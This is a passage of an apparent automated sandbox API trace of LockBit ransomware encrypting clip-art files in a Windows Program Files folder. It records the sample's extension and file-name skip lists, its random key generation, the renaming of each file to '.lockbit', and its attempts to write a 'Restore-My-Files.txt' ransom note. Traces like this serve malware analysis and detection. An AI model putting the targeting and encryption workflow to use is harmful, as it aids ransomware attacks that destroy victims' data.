lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0127.132] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP.lockbit") returned 72 [0127.132] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0127.133] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0127.133] malloc (_Size=0x40068) returned 0x3df0008 [0127.133] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0127.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0127.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0127.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0127.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0127.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0127.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0127.135] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0128.661] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0128.661] malloc (_Size=0xa6) returned 0x77d7a8 [0128.661] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0128.672] free (_Block=0x77d7a8) [0128.672] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0128.672] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0128.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0128.673] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2661900, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x65df6970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb2661900, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101861.BMP", cAlternateFileName="")) returned 1 [0128.673] lstrcmpiW (lpString1=".", lpString2="J0101861.BMP") returned -1 [0128.673] lstrcmpiW (lpString1="..", lpString2="J0101861.BMP") returned -1 [0128.673] PathFindExtensionW (pszPath="J0101861.BMP") returned=".BMP" [0128.673] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0128.673] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0128.673] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0128.673] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0128.673] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0128.673] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0128.674] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101861.BMP") returned 1 [0128.674] lstrcmpiW (lpString1="ntldr", lpString2="J0101861.BMP") returned 1 [0128.674] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101861.BMP") returned 1 [0128.674] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101861.BMP") returned -1 [0128.674] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101861.BMP") returned -1 [0128.674] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101861.BMP") returned 1 [0128.674] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101861.BMP") returned -1 [0128.674] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0128.674] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned=".BMP" [0128.674] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0128.674] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0128.674] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0128.675] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0128.675] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP.lockbit") returned 72 [0128.675] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0128.676] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0128.677] malloc (_Size=0x40068) returned 0x3df0008 [0128.677] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0128.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0128.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0128.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0128.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0128.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0128.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0128.677] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0129.656] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0129.656] malloc (_Size=0xa6) returned 0x77d7a8 [0129.656] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0129.698] free (_Block=0x77d7a8) [0129.698] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0129.698] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0129.698] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0129.698] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5f9a000, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb5f9a000, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101862.BMP", cAlternateFileName="")) returned 1 [0129.698] lstrcmpiW (lpString1=".", lpString2="J0101862.BMP") returned -1 [0129.698] lstrcmpiW (lpString1="..", lpString2="J0101862.BMP") returned -1 [0129.698] PathFindExtensionW (pszPath="J0101862.BMP") returned=".BMP" [0129.698] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0129.698] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0129.698] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0129.698] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0129.698] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0129.698] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0129.698] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0129.698] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0129.698] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0129.698] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0129.698] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0129.699] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0129.699] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0129.699] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101862.BMP") returned 1 [0129.700] lstrcmpiW (lpString1="ntldr", lpString2="J0101862.BMP") returned 1 [0129.700] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101862.BMP") returned 1 [0129.700] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101862.BMP") returned -1 [0129.700] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101862.BMP") returned -1 [0129.700] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101862.BMP") returned 1 [0129.700] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101862.BMP") returned -1 [0129.700] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0129.700] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned=".BMP" [0129.700] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0129.700] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0129.700] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0129.701] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0129.701] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP.lockbit") returned 72 [0129.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0129.702] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0129.702] malloc (_Size=0x40068) returned 0x3df0008 [0129.702] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0129.702] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0129.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0129.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0129.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0129.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0129.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0129.703] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0130.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0130.781] malloc (_Size=0xa6) returned 0x77d7a8 [0130.781] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0132.209] free (_Block=0x77d7a8) [0132.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0132.209] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0132.209] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0132.209] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1e56200, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc1e56200, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101863.BMP", cAlternateFileName="")) returned 1 [0132.209] lstrcmpiW (lpString1=".", lpString2="J0101863.BMP") returned -1 [0132.209] lstrcmpiW (lpString1="..", lpString2="J0101863.BMP") returned -1 [0132.209] PathFindExtensionW (pszPath="J0101863.BMP") returned=".BMP" [0132.209] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0132.209] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0132.209] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0132.209] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0132.209] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0132.210] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".prf", 